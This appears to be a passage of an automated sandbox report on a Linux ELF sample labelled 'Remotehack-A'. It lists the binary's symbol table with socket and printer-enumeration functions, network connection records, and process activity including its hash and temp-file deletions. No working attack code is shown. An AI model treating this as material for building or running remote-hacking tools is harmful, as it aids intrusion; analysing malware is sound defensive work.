                                                                                  __gmon_start__.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                  __init_array_end.symtab0x604e080NOTYPE<unknown>DEFAULT19
                                                                                  __init_array_start.symtab0x604e000NOTYPE<unknown>DEFAULT19
                                                                                  __libc_csu_fini.symtab0x4034a02FUNC<unknown>DEFAULT14
                                                                                  __libc_csu_init.symtab0x403430101FUNC<unknown>DEFAULT14
                                                                                  __libc_start_main@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  _edata.symtab0x6050d00NOTYPE<unknown>DEFAULT25
                                                                                  _end.symtab0x6050e80NOTYPE<unknown>DEFAULT26
                                                                                  _fini.symtab0x4034a40FUNC<unknown>DEFAULT15
                                                                                  _init.symtab0x4008a80FUNC<unknown>DEFAULT12
                                                                                  _start.symtab0x400a300FUNC<unknown>DEFAULT14
                                                                                  atoi@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  close@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  completed.6362.symtab0x6050d01OBJECT<unknown>DEFAULT26
                                                                                  connect@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                  crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                  data_start.symtab0x6050c00NOTYPE<unknown>DEFAULT25
                                                                                  deregister_tm_clones.symtab0x400a600FUNC<unknown>DEFAULT14
                                                                                  elf-init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                  enumprinters.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                  exit@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  frame_dummy.symtab0x400af00FUNC<unknown>DEFAULT14
                                                                                  free@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  frontend.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                  functions.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                  gethostbyname@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  hextoint.symtab0x402411619FUNC<unknown>DEFAULT14
                                                                                  htons@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  inet_addr@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                  main.symtab0x400b20159FUNC<unknown>DEFAULT14
                                                                                  memcpy@@GLIBC_2.14.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  memset@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  my.symtab0x6050e08OBJECT<unknown>DEFAULT26
                                                                                  puts@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  recv@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  register_tm_clones.symtab0x400a900FUNC<unknown>DEFAULT14
                                                                                  send@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  shutdown@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  sm.symtab0x6050d84OBJECT<unknown>DEFAULT26
                                                                                  socket@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  strcpy@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  strdup@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  strlen@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  usage.symtab0x400bbf34FUNC<unknown>DEFAULT14
                                                                                  usleep@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 28, 2024 06:39:51.834810019 CEST43928443192.168.2.2391.189.91.42
                                                                                  May 28, 2024 06:39:52.498630047 CEST4433360654.171.230.55192.168.2.23
                                                                                  May 28, 2024 06:39:52.498972893 CEST33606443192.168.2.2354.171.230.55
                                                                                  May 28, 2024 06:39:52.503923893 CEST4433360654.171.230.55192.168.2.23
                                                                                  May 28, 2024 06:39:55.162437916 CEST4251680192.168.2.23109.202.202.202
                                                                                  May 28, 2024 06:39:57.466089964 CEST42836443192.168.2.2391.189.91.43
                                                                                  May 28, 2024 06:40:12.823954105 CEST43928443192.168.2.2391.189.91.42
                                                                                  May 28, 2024 06:40:23.062818050 CEST42836443192.168.2.2391.189.91.43
                                                                                  May 28, 2024 06:40:25.110253096 CEST4251680192.168.2.23109.202.202.202
                                                                                  May 28, 2024 06:40:53.778462887 CEST43928443192.168.2.2391.189.91.42
                                                                                  May 28, 2024 06:41:14.255650997 CEST42836443192.168.2.2391.189.91.43

                                                                                  System Behavior

                                                                                  Start time (UTC):04:39:50
                                                                                  Start date (UTC):28/05/2024
                                                                                  Path:/tmp/SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf
                                                                                  Arguments:/tmp/SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf
                                                                                  File size:31124 bytes
                                                                                  MD5 hash:9c4a6db5821b4a390b09223e5047cce7

                                                                                  Start time (UTC):04:39:51
                                                                                  Start date (UTC):28/05/2024
                                                                                  Path:/usr/bin/dash
                                                                                  Arguments:-
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):04:39:51
                                                                                  Start date (UTC):28/05/2024
                                                                                  Path:/usr/bin/rm
                                                                                  Arguments:rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3M
                                                                                  File size:72056 bytes
                                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                  Start time (UTC):04:39:51
                                                                                  Start date (UTC):28/05/2024
                                                                                  Path:/usr/bin/dash
                                                                                  Arguments:-
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):04:39:51
                                                                                  Start date (UTC):28/05/2024
                                                                                  Path:/usr/bin/rm
                                                                                  Arguments:rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3M
                                                                                  File size:72056 bytes
                                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b